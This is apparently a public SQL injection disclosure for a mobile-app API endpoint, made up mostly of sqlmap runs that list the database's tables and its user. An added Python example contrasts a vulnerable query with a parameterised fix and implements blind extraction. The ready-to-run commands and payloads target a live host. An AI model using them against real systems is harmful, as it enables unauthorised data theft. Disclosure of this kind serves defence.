2015-02-28: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public.
2015-04-14: The vendor has deliberately ignored the vulnerability; details disclosed to the public.
SQL injection is present.
Without further ado, here is the sqlmap output:
kingdomdeMacBook-Pro:sqlmap-dev king$ python sqlmap.py -u "http://api.himoca.com/moca/System/Info" --data "uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW%2BtqMl8qJcqSTz%2FjBpBUtjdVgDxL10mcu8%2Bx3W7ePe%2FZrG9zLI3twPtqPaHXmg%0AgubMdTF%2BFtSwN8Y%2FDKzFGiZvGFPI%2FQOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVr%0Aj38Y2ETW%2FLuo%2FYCFM8I%3D%0A&platform_name=android*&version_api=102&imei=358239058886799&versionCode=4080&mac=cc%3Afa%3A00%3Af4%3Ade%3A43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6" --tables -D "moca" --threads 10

sqlmap/1.0-dev-9fff88d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:11:10

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[08:11:13] [INFO] resuming back-end DBMS 'mysql'
[08:11:13] [INFO] testing connection to the target URL
[08:11:13] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND 5849=5849 AND 'DDCV'='DDCV&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android'; SELECT SLEEP(5)-- &version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND SLEEP(5) AND 'SKyz'='SKyz&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6
---
[08:11:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.32
back-end DBMS: MySQL 5.0.11
[08:11:13] [INFO] fetching tables for database: 'moca'
[08:11:13] [INFO] fetching number of tables for database 'moca'
[08:11:13] [INFO] resumed: 86
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 6
[08:11:13] [INFO] resumed: advert
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 11
[08:11:13] [INFO] resumed: advert_copy
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 5
[08:11:13] [INFO] resumed: agent
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 10
[08:11:13] [INFO] resumed: agent_user
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 5
[08:11:13] [INFO] resumed: album
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 10
[08:11:13] [INFO] resumed: api_config
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 5
[08:11:13] [INFO] resumed: award
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 10
[08:11:13] [INFO] resumed: award_1105
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 10
[08:11:13] [INFO] resumed: award_1118
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 14
[08:11:13] [INFO] resumed: award_360_1203
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 8
[08:11:13] [INFO] resumed: award_sd
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 9
[08:11:13] [INFO] resumed: award_wdj
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 13
[08:11:13] [INFO] resumed: award_wdj1224
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 11
[08:11:13] [INFO] resumed: bank_config
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 13
[08:11:13] [INFO] resumed: banner_config
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 18
[08:11:13] [INFO] resumed: banner_config_copy
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] resumed: 8
[08:11:13] [INFO] resumed: black_ip
[08:11:13] [INFO] retrieving the length of query output
[08:11:13] [INFO] retrieved: 13^C
[08:11:15] [ERROR] user aborted

[*] shutting down at 08:11:15

kingdomdeMacBook-Pro:sqlmap-dev king$ python sqlmap.py -u "http://api.himoca.com/moca/System/Info" --data "uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW%2BtqMl8qJcqSTz%2FjBpBUtjdVgDxL10mcu8%2Bx3W7ePe%2FZrG9zLI3twPtqPaHXmg%0AgubMdTF%2BFtSwN8Y%2FDKzFGiZvGFPI%2FQOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVr%0Aj38Y2ETW%2FLuo%2FYCFM8I%3D%0A&platform_name=android*&version_api=102&imei=358239058886799&versionCode=4080&mac=cc%3Afa%3A00%3Af4%3Ade%3A43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6" --current-user

sqlmap/1.0-dev-9fff88d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:11:33

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[08:11:34] [INFO] resuming back-end DBMS 'mysql'
[08:11:34] [INFO] testing connection to the target URL
[08:11:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND 5849=5849 AND 'DDCV'='DDCV&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android'; SELECT SLEEP(5)-- &version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND SLEEP(5) AND 'SKyz'='SKyz&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6
---
[08:11:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.32
back-end DBMS: MySQL 5.0.11
[08:11:34] [INFO] fetching current user
[08:11:34] [INFO] resumed: [email protected].%
current user: '[email protected].%'
[08:11:34] [INFO] fetched data logged to text files under '/Users/king/.sqlmap/output/api.himoca.com'
Right, 86 tables; that is quite a few.
As above.
Filter the input (a parameterised query is the robust fix).
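To make the two halves of this report concrete (the injection sqlmap found in the platform_name POST parameter, and the fix), here is an added example that is not code from the report or from api.himoca.com. It is a hypothetical handler for the endpoint in its vulnerable string-built form next to the parameterised form, plus the boolean-based blind oracle that sqlmap's log shows it using ("retrieving the length of query output", then one character at a time). The real backend is PHP 5.4 on MySQL; Python's bundled sqlite3 stands in so the example runs offline, sqlite_master stands in for information_schema.tables, and the table names api_config and agent_user are borrowed from the sqlmap output while their columns and rows are constructed.

```python
"""Vulnerable vs. parameterised query for the platform_name parameter, and the
boolean-blind extraction loop sqlmap ran against it. Added example; sqlite3
stands in for the MySQL backend, all rows are constructed sample data."""
import sqlite3

# Scalar expression sqlmap would extract: first table name in the catalogue
# (sqlite_master here; information_schema.tables on the real MySQL server).
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"


def make_db():
    """Constructed schema using two table names seen in the sqlmap log."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE api_config (platform_name TEXT, version_api INTEGER, info TEXT);
        INSERT INTO api_config VALUES ('android', 102, 'android-config');
        INSERT INTO api_config VALUES ('ios', 102, 'ios-config');
        CREATE TABLE agent_user (id INTEGER, name TEXT, pwd TEXT);
        INSERT INTO agent_user VALUES (1, 'admin', 'constructed-secret');
    """)
    return con


def system_info_vulnerable(con, platform_name):
    """Hypothetical /moca/System/Info lookup with the parameter spliced into
    the SQL text, so android' AND 5849=5849 AND 'DDCV'='DDCV becomes part
    of the WHERE clause instead of a value."""
    sql = "SELECT info FROM api_config WHERE platform_name = '%s'" % platform_name
    return [row[0] for row in con.execute(sql)]


def system_info_fixed(con, platform_name):
    """Same lookup with the value bound as a parameter: quotes and keywords
    inside it are data, never syntax."""
    sql = "SELECT info FROM api_config WHERE platform_name = ?"
    return [row[0] for row in con.execute(sql, (platform_name,))]


def oracle(query_fn, con, condition):
    """True iff the response for the injected condition equals the response
    for the untouched value. Payload shape copied from sqlmap's log."""
    payload = "android' AND %s AND 'DDCV'='DDCV" % condition
    return query_fn(con, payload) == query_fn(con, "android")


def blind_extract(query_fn, con, expr, max_len=32):
    """Recover the string value of SQL expression expr using only the
    true/false oracle: first its length, then each character by bisection
    over printable ASCII. Returns None when the parameter is not injectable
    (the 1=1 / 1=2 sanity check sqlmap also performs fails)."""
    if not (oracle(query_fn, con, "1=1") and not oracle(query_fn, con, "1=2")):
        return None
    length = 0
    for n in range(max_len + 1):
        if oracle(query_fn, con, "LENGTH(%s)=%d" % (expr, n)):
            length = n
            break
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # UNICODE() is SQLite's counterpart of MySQL ORD()
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(query_fn, con, "UNICODE(SUBSTR(%s,%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", blind_extract(system_info_vulnerable, db, FIRST_TABLE))  # agent_user
    print("fixed:     ", blind_extract(system_info_fixed, db, FIRST_TABLE))       # None
```

Against the string-built query the oracle recovers the first table name (10 characters, as the log's "resumed: 10" / "agent_user" pair shows) in roughly a hundred requests; against the parameterised query the 1=1 check already fails and nothing is extracted, which is why binding (PDO prepare/execute or mysqli bind_param in PHP) rather than ad hoc filtering is the fix. Two details in the log raise the stakes beyond reading data: sqlmap also confirmed stacked queries, so the database layer executes more than one statement per call, and the current-user output ends in a `.%` host wildcard, so the application's database account is not restricted to a single host.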
The vendor could not be reached, or the vendor actively declined.